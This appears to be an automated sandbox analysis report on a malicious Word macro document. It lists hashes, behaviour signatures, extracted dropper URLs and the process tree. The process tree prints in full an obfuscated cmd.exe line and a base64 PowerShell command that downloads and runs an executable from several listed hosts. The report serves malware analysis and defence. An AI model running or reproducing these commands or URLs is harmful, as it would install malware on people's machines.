Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
19/09/2024, 17:56
General
-
Target
ebe39e8732bc9ba102dfb014f422ca2e_JaffaCakes118.doc
-
Size
88KB
-
MD5
ebe39e8732bc9ba102dfb014f422ca2e
-
SHA1
150477cba969e4b7f6b40ee6a9b3c0f7cd998dfc
-
SHA256
c6a27327929ea0e7b66df5263dd5c74529701dddba28593a2cad44768f5054fd
-
SHA512
08acb2bff3efab217e760c77cf7424aaf44e2be3a6ad454243b77b6967d0ea5f6b6ac2b83220e24a0a2764aa828ab96026bd5b4dab17f5bdc6f84b12fd8ab654
-
SSDEEP
1536:jptJlmrJpmxlRw99NBP+aE8CxaupItj8SWnQt:Nte2dw99fdupuj
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://4surskate.com/vKi
exe.dropper
http://riakom.com/T
exe.dropper
http://zavod-pt.com/T
exe.dropper
http://natco-pharma.com/PRBHaG
exe.dropper
http://bitwaopoznan.pl//gp6
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 3 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ebe39e8732bc9ba102dfb014f422ca2e_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\CMD.exeCMD /v:^O^ ^ /R" ^Se^T ^ ^ ^h6^AV==^AAIAACA^g^A^A^IAAC^A^g^AAIAACA^g^AAI^AAC^AgA^A^IAACAgA^AI^AAC^A^9^B^Qf^AsHA^oB^wY^AQH^AhBw^YA^0HA^7A^w^aAE^GAlBgc^AI^G^A^7A^wV^A^YE^Ak^B^A^JAACAtBQZA^Q^H^A^JBQL^A^U^G^Ar^B^wb^AY^H^AuB^QS^As^DA^p^AwVAYE^A^kBA^JAAC^A^s^A^QQ^A^wEAoB^AJAgCA^l^BAbAk^GA^G^BA^Z^AE^G^AvBA^b^A4^GA^3B^wb^AQ^EAuA^g^Z^A8EAB^B^A^J^A^s^HA5BgcA^Q^HA^7^B^QKAQG^A^o^B^AV^A^QCA^g^Ag^bA^k^GA^g^AQQA^wE^A^oB^AJAgC^Ao^B^w^YAE^GAlBgc^A^8^G^A^m^B^wOAcC^A^lBA^e^AUG^Au^A^w^J^AsCApB^gc^A^g^F^A^k^A^w^K^AcC^AcBwJ^AsC^A^j^BQ^aAw^GAiBQ^d^A^AH^A6^A^gd^A4^GAlBA^J^A^0D^AX^B^gR^A^QG^A^kA^wOAcCA^y^AA^M^A^Q^DAnA^AI^A0^DA^gAQ^aA^IH^AYB^A^J^AsD^A^pAw^J^A^A^E^An^A^A^K^A^Q^HA^p^BAb^AAHA^TBgLAcCA^2^AAc^AcGAv^AwLA^wGAwB^g^LA^4GAh^B^g^bA^o^H^AvB^AcA^8^GAhB^wdAQH^ApB^g^Y^A^8C^AvAgO^A^A^HA0^BA^dAgG^AABwR^AE^GA^I^B^gQA^IF^AQ^B^wLA0^GAv^Bw^YA4CA^hB^Q^b^AIHA^hBA^a^AA^H^A^tAwbAM^GA0^BQY^A4GAvA^wL^A^o^D^A^wB^A^dA^QH^Ao^BA^Q^AQFAvAQ^bA8^G^Aj^B^gL^AQ^H^A^w^B^Q^LA^Q^G^Av^B^gdAEGA^6B^wLA8CA^6^AAc^AQ^HA^0^B^Aa^AAE^A^U^B^wL^A0G^AvB^w^YA^4C^At^Bwb^A^sG^A^h^B^Q^aA^IHAvA^wL^Ao^D^Aw^B^Ad^A^QH^Ao^BA^QAk^G^A^L^B^g^dA8C^A^tB^w^bAM^G^A^u^A^QZ^A^Q^H^Ah^Bwa^A^M^HA^y^B^Q^d^AM^HA^0^A^wLA^8CA^6AAc^A^QHA0^BA^aAcC^A9^AAZAg^G^AUB^AJ^AsDA^0^B^gb^AUGAp^BA^bAMEAi^BQ^Z^AcF^AuA^A^dA^U^G^A^O^B^A^I^AQH^AjB^Q^Z^AoG^A^iBw^bA0C^A^3BQZA^4^GA^9^A^g^Z^A^8E^A^B^BAJ^ ^e^-^ lle^hsr^e^wop&& ^F^or /^l %k ^iN ( ^8^81^ -^1^ ^ ^0)^Do ^s^ET u^f^y^d=!u^f^y^d!!^h6^AV:~ %k, 1!& i^f %k l^s^S ^1 C^aL^L %u^f^y^d:~ ^-^8^82% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JABBAE8AZgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABUAGgAZAA9ACcAaAB0AHQAcAA6AC8ALwA0AHMAdQByAHMAawBhAHQAZQAuAGMAbwBtAC8AdgBLAGkAQABoAHQAdABwADoALwAvAHIAaQBhAGsAbwBtAC4AYwBvAG0ALwBUAEAAaAB0AHQAcAA6AC8ALwB6AGEAdgBvAGQALQBwAHQALgBjAG8AbQAvAFQAQABoAHQAdABwADoALwAvAG4AYQB0AGMAbwAtAHAAaABhAHIAbQBhAC4AYwBvAG0ALwBQAFIAQgBIAGEARwBAAGgAdAB0AHAAOgAvAC8AYgBpAHQAdwBhAG8AcABvAHoAbgBhAG4ALgBwAGwALwAvAGcAcAA2ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABYAHIAaQAgAD0AIAAnADQAMAAyACcAOwAkAGQARgBXAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAFgAcgBpACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABoAEwAQQAgAGkAbgAgACQAVABoAGQAKQB7AHQAcgB5AHsAJABBAE8AZgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABoAEwAQQAsACAAJABkAEYAVwApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAEYAVwA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD55a5bcc9da71403ecdff728dd82eb8b4f
SHA1ed8b452a3ae29763c9ccca907d54290d9f3b0a59
SHA2567c488af65067e6a6a6d58d068297dd40dbdb715eca75114c9fd03fbeb055d37c
SHA512eeb179320fb45e9df15e97879ce3d847181319fdd6191bbe6cfce849a957c33f9db08b22b4f88cd02368312bb2f7d329224e803bd708b7f331699bad6493ffbd
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
44KB